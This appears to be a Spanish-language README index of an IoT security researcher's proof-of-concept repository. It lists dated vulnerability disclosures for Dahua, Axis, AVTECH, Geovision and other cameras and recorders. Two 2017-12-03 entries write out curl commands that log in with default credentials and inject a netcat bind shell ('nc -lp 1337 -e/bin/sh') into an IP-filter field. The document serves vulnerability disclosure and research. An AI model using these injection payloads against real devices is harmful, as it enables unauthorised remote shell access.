
Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.
PoC variados - Internet de cosas (in)seguras
Merece mucho la pena leer sobre estas cosas (in)seguras de mala calidad: https://ipvm.com/reports/security-exploits
2021-10-19
Todo el crédito para Watchful_IP (https://watchfulip.github.io/)
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
Detalles: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC: https://github.com/mcw0/DahuaConsole
2021-09-06
Dos bypass de autenticación independientes.
Debido al altísimo potencial de otro "hackeo masivo de Dahua", mantendré los detalles de Full Disclosure hasta el 6 de octubre de 2021.
Se recomienda encarecidamente actualizar el firmware hasta entonces.
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
Durante esta semana se ha establecido contacto con Dahua PSIRT; se han proporcionado detalles, PoC y pruebas para 23 proveedores de nube diferentes. También seguiré el nuevo ensayo de Google Zero 'Policy and Disclosure: 2020 Edition' (ya que tiene sentido para mí), lo que significa que publicaré después de 90 días, independientemente de si Dahua lanza actualizaciones antes o después del 09.05.2020 19:00 UTC (9 de mayo de 2020 19:00 UTC).
Dahua, por favor, arregladlo y haced las actualizaciones disponibles antes de esta fecha...
Referencia: Google Zero 'Policy and Disclosure: 2020 Edition': https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
Acabo de revelar a Dahua PSIRT fugas de credenciales (que terminan en texto claro) del SDK de Dahua; a ver cómo se toman esta información. Bastante mal cuando hay más de 20 proveedores de nube diferentes involucrados... 90 días contando desde hoy.
2020-01-20
Nuevo repositorio creado donde planeo subir algunas herramientas.
Primero: Dahua-JSON-Debug-Console-v2.py
2019-10-06 (cosas viejas)
Detectar anónimamente el modelo y la versión de firmware de dispositivos Axis (1998 - 2019).
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
Todos los detalles técnicos junto con el PoC en Python se publicarán aquí el 20 de agosto de 2019.
2019-05-15
Múltiples stack overflows, RCE, divulgación de usuario/contraseña en texto claro y más
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
Este script usará el protocolo binario P2P 'DHIP' de Dahua, que funciona en puertos HTTP/HTTPS normales y TCP/5000
Se adjuntará a la 'Debug Console' interna de los dispositivos Dahua usando JSON (mismo tipo que el antiguo debug en TCP/6789)
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
Que os divirtáis, bashis
2019-01-23
Saludos, ha pasado mucho tiempo sin publicar ...
Sigo por aquí y haciendo mi investigación, pero la novedad es que también intento trabajar con VDOO (https://www.vdoo.com/) para la gestión con los fabricantes, y esto desgraciadamente ha retrasado un poco mi proceso de Full Disclosure ...
De todos modos, se vienen varias investigaciones interesantes como Full Disclosure aquí en mi GitHub.
Con la colaboración de VDOO puedo dedicarme a lo que me gusta, y no perder tiempo con los fabricantes que (no quieren | no entienden | quieren ignorar | quieren retrasar | lo que sea).
Lo más reciente son cosas de Reolink (https://reolink.com/), que encontraréis aquí: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.
2018-06-18
AVTECH {DVR/NVR/IPC} Heap Overflow, IPCP API, RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE (autenticado)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd y OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} RCE autenticado
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. IP Camera/Video/Access Control - Múltiples ejecuciones remotas de comandos - Múltiples stack overflows - Double free - Acceso no autorizado https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
Geovision Inc. IP Camera y Video Server - PoC de ejecución remota de comandos https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
Demonio Herospeed TelnetSwitch ejecutándose en TCP/787, para permitir habilitar telnetd. Donde un pequeño stack overflow nos permite sobrescribir la contraseña generada dinámicamente y habilitar telnetd. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
Pequeño wrapper de OpenSSL para iterar sobre diferentes claves/digests de cifrado y cifradores en imágenes de firmware Foscam IPC. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
Desofuscar cadenas/login/contraseña/cryptokey en varios binarios y librerías Foscam IPC https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// Habilitar 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Añadir al 'IP Filter' y ejecutar
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Deshabilitar 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Eliminar del 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
2017-12-03
// Habilitar 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Añadir al 'IP Filter' y ejecutar
curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Deshabilitar 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Eliminar del 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
Nota: Bastante seguro de que hay otros OEM que comparten lo mismo.
2017-12-01 Axis Communications MPQT/PACS Heap Overflow y fuga de información https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
2017-11-13 Shell de privacidad stunnel inverso TLSv1 https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt
2017-11-13 Cámaras IP Vivotek - Remote Stack Overflow https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
2017-10-29 Uniview RCE y PoC de exportación de configuración https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt
2017-10-19 Un viejo fuzzing olvidado del Q3/2016 que condujo a RCE (PoC: shell inversa de conexión remota) y lectura remota de /etc/shadow. Reportado a Axis y corregido en Q3/2016; aun así lo publico ahora aquí porque puede ser una buena pista. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE
2017-10-17 Habilitar / Deshabilitar Telnetd en Dahua (para versiones de firmware más recientes) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py
2017-05-03
Reedición pública del PoC del backdoor de Dahua https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
Con mi nuevo conocimiento de dispositivos vulnerables por ahí con un número increíble de más de 1 millón de unidades Dahua / OEM, conocimiento que proviene de un informe realizado por NSFOCUS y de mi propia investigación en shodan.io.
Con este conocimiento, no publicaré el PoC en Python públicamente como dije antes para el 5 de abril, ya que no es necesario cuando el PoC ya ha sido verificado por IPVM y otros investigadores de seguridad independientes.
Sin embargo, estoy abierto a compartir el PoC con investigadores de seguridad serios si así se desea; envíenme un correo fuera de la lista y sean claros sobre quiénes son para no tomarlos por pedigüeños, a los cuales ignoro.
Informe de NSFOCUS: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
¿Os habéis fijado en las fechas y horas de los parches de Dahua? Mirad las capturas de pantalla de http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
No solo NVR/DVR/IPC/HDCVI están en la lista
También el sistema de intercomunicación; el VTO2000A ha sido confirmado http://www1.dahuasecurity.com/au/products/vto2000a-762.html